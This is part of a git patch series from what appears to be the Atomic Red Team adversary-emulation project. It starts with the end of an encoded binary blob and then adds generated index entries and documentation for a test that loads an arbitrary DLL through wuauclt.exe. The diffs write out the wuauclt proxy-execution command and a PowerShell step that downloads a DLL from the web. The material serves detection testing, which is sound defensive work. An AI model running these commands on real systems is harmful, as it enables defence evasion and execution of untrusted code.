zdS;?jca?*w9#4UTfw7%>4$)HIK&Z5xzti<;(L*yu^QJ^e-Il0@(;Aq0$H?r%&vbo? z@Iw(r&ohfw=4J)D>u1I2Z(R|RdTzouRp!N0j{7sp<*aIJ0=&lBX96eZIXEe{m^;icgh?nwXP9;y( z9{2`grrn0_Mq~00&=5R&ImY|`i^2YTP+Y|j;VI!^^cYVQp3Go23Re)V3P}Pf;lD02 zHGRO(z;r}-85}BgL>L7|T{$9*S=bl|0Q?i*F)+%5N95OdD5= zE3-@(hS3ZShZ-I2s-M0fRpQZsxh;ag2S-7K24 zLUf}Dvl2dZQsiFX-o_H{9pVSjWF&Z648l8I6n8cZA^h{G3K%Jze|!w&Cl`Q3&)+$W znEe!MH%7om=x)?KUHl`^mjy*e|Ir~MSfKATY>*6zJeC>xOk*B4BOq`lw zZW9Y%6D?JJ7gTtJ)Dv$RlQ{*7y=P&>@(^OK+267!5jfvZQkI-$2P{s7!!+MDwO zCHVU4j$_I)^@Ov3A7JvV&H2551fu;8I|6#NqW`Ug8?`+MEv*th5CW?GA)*%;v=T?O zd%5cRJ1iateB|v=^5n`ZM|pBo=dX=&?;(!WTBJ{fv&6zYr=2C3UCwzzz*sZRr7*9! 
z6|yPCn+;-K@jAfg1rcAH(Wk!k!v|0k)EOTdQ`kO-2Al6-taF)AfMJ{1!b8FeAlRVK zV)XL#oRV$J=u(gf3>IOj>0DM{mT2=|dC2*T`cj_0wT$N;1L}ZcpFch41)eH(H!Xiv zDN}En<6k}`7pklBbBFxPGcs1qLlqP6;QWN0jD}rl@?JN)kFY`vatC0JG3LvrVlEDx z(Eb)(>9I=`|4JL!v;<$_U&Vdxi~qD!USLlz-Tq~BIf6} zp*Eac(nQ+B#{R#Sr=N8DK1DOPoys6C>IrjI-v&#RXjfl6dieq1O#4?%WIFjZPu33} zLw{=(U=yjkR$*>%^+$A>;OPgCLx^nz3#aZ9NdiABvI}PVq#-qwrWZ}D9chgOv}}@3 zLPXk=-awtW+CNG{EUYa&)lbDxMGR*B;4UiF*jM^@P(8noF3MV95Vhkp(Bi^u0BoZv zpu4VwPaGO(M}j{b?s&R!()j=a(%|M)=o%^%rTKK%EkH4f=OFU=X`ZY73-(Q}KH@$` zD%%cI$nHdE8L>3BV4hyEnwIKx-3ow-`8bhL035pO5i&^*=kw+7$m8bB$Mg!A{gAc& zhG|>!IotLxu{}g%7@N%WGF0Nlw)t&bzi3nR9vKmufE!bPPlGz-)f?0o>$got6sfy@ z+XpvFkwk+!rcQc~q;Iq}7L7Xh)NeZ-jz~=@ySuUI1$eeMs3*`F`KdPdoJ0#x7Te(u z7lM_#vo7PXF{Pre-I2qTg>^9k7Yh5%eug8Nc#oSOu%TconmZpGikCL1!t2;j>XW0k zhLrFE(1|?ohJXxW8)3^Qw_fHw;@pFx)laG9Y_ZOR|6UL;f?W>men2k3DUHWQgdSYM zshuOjCSVwAhUlXBTGF^Uely(Jj`5-QL|$}^qXi3 zcuH^s^L;cTD(59f#Sx(xBq9$%5ishr3OW}nxGN+Nmjs4iGA<_Qe{W`)@Y#HKaL3avhxNOB#&tHO9Bg_}*cB{l@otd z3&t#dwFP%rFzaXUMdth6?giF6URLmb1Y10&-$@IGg59C4>+BmNEn+t#A6tZczA4Sh za91&&)5OJ$iFD;c%F1v+`NP(Q3B^KQA}7hA%Mx zaEvvr4XqD7vi{VwKl|{Oe{Q+&-!6LiwJM7H>gzVFjZ1QT!zNkUq-=;s6LLt}AWN}m zd;|5>hTdyxHms4lrC?k#7+D-Lz1_EiZM<2#JxhVIcJS!%YVnLZ5&wTnHoJ}4S6O4umCsyC0dsZa zF;|U)xvJ-#^kH0~x~v2P@_u9*XOvzA{`L&ohVz=EI;Ulx)4`k_`OFD>XLV65YwyN@ zU4?wWvfl{2X9itxp@Usm<75}g=btQ%o!3rwXfk^oI%yo2UI$IkC}&Mhi_It}Z>k(y zfsGYxggoEQ@@0E0w>`&W)yZQkwzJ}z0#;n@XeprfE<#8x{}br6%{T=X;TlWOmSbZ% zh^1jG!$)a8D@A)s+wxc`+EiLy60^Ak#OEM$*#?<|bPMgQ5VFE*N6f4j+Fm0t=lr4= zwIQ2u=g|qT#<(DUHdlbY3fY59lVCYPMyo|tM|U@CRf4i|8#pwcvS|S0h=~|;1g-QY z@IH~T+8MkbV1L>T-j}7X%Dz0;aa%aj*eiwDw;I>n-01gK8?nXu7YM8l#A8w@+!+o9 zx`L68Zb@cr3HWiPBcN=FNr7;rGaBfS;))#I66g-c6~?Y-JyK6x0=91Tnzc8#H8nRb zt?`&XuVJtVD~crduxqFBfW%g^KwRnybcVYj3{dBmu|Oyq=?rg5$WkB@l;!9>fuOu; zGp<{vWjNR!zIRF_MK*`!XrxDqpyZla8qtW<8&(2JaAUW`*di8?(AtC|1!f7(M|q^j zSTGi@?1@+26OL4dWTg`SPL*(vRN1|>a%rX6kk{;Mlbb~N^eq!_8+U^Jew?+C4u z@}=ShIX6nm>Vzz#r7dzaBw;ChSZG5?!;zpOWmznh+Z4BmsC%Uh+lnO&x5}3~pPOECoBjWRt{g-4a)%o;C!iK8^-Rgt6}2 
zCUmpeL9Koa3l0tNN3kVS_5f+`KCBK z7R3KL{qaPg1p8VwGM%kj0RI$uH*f{;u*E0%E1W6zf`1Y)g1uh@9s_&~d%t)YWPtA? zw*db&U|A`A04F$(+z$K{;GKA->jK^mI0tv2t-xymTal>_ZGdSD-wAlw!U>+R@V5c& zxCfCw!3!+>V!*A)gYZf4NsCV~W8nk~aJHbj%>n#1@;=}M@54D`2k<_?y~w0P@D&R` z33vs5Fuer+Re)W{Zv!WY`=x(Z@Zm6s+7vl=H_h2_R#Jch=QoMZS^~HrNg7LW2v$1=N2nUgPU3o%| zTo(^@Nj<@MWluOHN8`~>r7{%lxh@#*soK1>T*Ouq?!;+e-OSR+)i<-gK%AqFUul+T c-jB51le_t&Ess|0@$KPzzS0r-N;Uq!0ZzO0NdN!< literal 0 HcmV?d00001 From 072ade0eb2fc26634dae16b6a1f7963e92b4b73e Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 21 Mar 2022 23:15:03 +0000 Subject: [PATCH 82/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1218/T1218.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml index 41c43533..415a834a 100644 --- a/atomics/T1218/T1218.yaml +++ b/atomics/T1218/T1218.yaml @@ -257,6 +257,7 @@ atomic_tests: name: powershell elevation_required: false - name: Load Arbitrary DLL via Wuauclt (Windows Update Client) + auto_generated_guid: 49fbd548-49e9-4bb7-94a6-3769613912b8 description: | This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. See https://dtm.uk/wuauclt/ diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 9f881dc3..dbd64ec0 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -933,3 +933,4 @@ f650456b-bd49-4bc1-ae9d-271b5b9581e7 66e647d1-8741-4e43-b7c1-334760c2047f 795d3248-0394-4d4d-8e86-4e8df2a2693f 95b25212-91a7-42ff-9613-124aca6845a8 +49fbd548-49e9-4bb7-94a6-3769613912b8 From bd96789f316f4373646000c5adb74d50a4db7424 Mon Sep 17 00:00:00 2001 
From: CircleCI Atomic Red Team doc generator Date: Mon, 21 Mar 2022 23:15:09 +0000 Subject: [PATCH 83/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 28 ++++++++++ atomics/T1218/T1218.md | 53 +++++++++++++++++++ 6 files changed, 85 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 76bc5da5..335b8d69 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -601,6 +601,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compile defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell defense-evasion,T1218,Signed Binary Proxy Execution,9,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell +defense-evasion,T1218,Signed Binary Proxy Execution,10,Load Arbitrary DLL via Wuauclt (Windows Update Client),49fbd548-49e9-4bb7-94a6-3769613912b8,command_prompt defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt defense-evasion,T1027.002,Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh 
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 709431ad..a45526c2 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -420,6 +420,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compile defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell defense-evasion,T1218,Signed Binary Proxy Execution,9,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell +defense-evasion,T1218,Signed Binary Proxy Execution,10,Load Arbitrary DLL via Wuauclt (Windows Update Client),49fbd548-49e9-4bb7-94a6-3769613912b8,command_prompt defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt defense-evasion,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 4471bbbd..3155f297 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -923,6 +923,7 @@ - Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows] - Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows] - Atomic Test #9: DiskShadow Command Execution [windows] + - Atomic Test #10: Load Arbitrary DLL via Wuauclt (Windows Update Client) [windows] - [T1216 Signed Script Proxy Execution](../../T1216/T1216.md) - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows] - Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index ce47d683..670521ae 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -667,6 +667,7 @@ - Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows] - Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows] - Atomic Test #9: DiskShadow Command Execution [windows] + - Atomic Test #10: Load Arbitrary DLL via Wuauclt (Windows Update Client) [windows] - [T1216 Signed Script Proxy Execution](../../T1216/T1216.md) - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows] - Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 9d1479f9..66fa8489 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -38283,6 +38283,34 @@ defense-evasion: command: "#{dspath} -S #{txt_payload} \n" name: powershell elevation_required: false + - name: Load Arbitrary DLL via Wuauclt (Windows Update Client) + auto_generated_guid: 49fbd548-49e9-4bb7-94a6-3769613912b8 + description: "This test uses Wuauclt to load an arbitrary DLL. Upon execution + with the default inputs, calculator.exe will be launched. \nSee https://dtm.uk/wuauclt/\n" + supported_platforms: + - windows + input_arguments: + arbitrary_dll: + description: Path of DLL to be loaded + type: String + default: PathToAtomicsFolder\T1218\bin\calc.dll + dependency_executor_name: powershell + dependencies: + - description: 'DLL to load must exist on disk as specified location (#{arbitrary_dll}) + +' + prereq_command: 'if (test-path "#{arbitrary_dll}"){exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{arbitrary_dll}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true" -OutFile "#{arbitrary_dll}" + executor: + command: 'wuauclt.exe /UpdateDeploymentProvider #{arbitrary_dll} /RunHandlerComServer + +' + cleanup_command: taskkill /f /im calculator.exe > nul 2>&1 + name: command_prompt T1216: technique: id: attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md index 2ff65d71..85f1e2a8 100644 --- a/atomics/T1218/T1218.md +++ b/atomics/T1218/T1218.md @@ -22,6 +22,8 @@ - [Atomic Test #9 - DiskShadow Command Execution](#atomic-test-9---diskshadow-command-execution) +- [Atomic Test #10 - Load Arbitrary DLL via Wuauclt (Windows Update Client)](#atomic-test-10---load-arbitrary-dll-via-wuauclt-windows-update-client) +
@@ -450,4 +452,55 @@ echo "DiskShadow.exe not found on disk at expected location" +
+
+ +## Atomic Test #10 - Load Arbitrary DLL via Wuauclt (Windows Update Client) +This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. +See https://dtm.uk/wuauclt/ + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 49fbd548-49e9-4bb7-94a6-3769613912b8 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| arbitrary_dll | Path of DLL to be loaded | String | PathToAtomicsFolder\T1218\bin\calc.dll| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +wuauclt.exe /UpdateDeploymentProvider #{arbitrary_dll} /RunHandlerComServer +``` + +#### Cleanup Commands: +```cmd +taskkill /f /im calculator.exe > nul 2>&1 +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: DLL to load must exist on disk as specified location (#{arbitrary_dll}) +##### Check Prereq Commands: +```powershell +if (test-path "#{arbitrary_dll}"){exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path #{arbitrary_dll}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true" -OutFile "#{arbitrary_dll}" +``` + + + +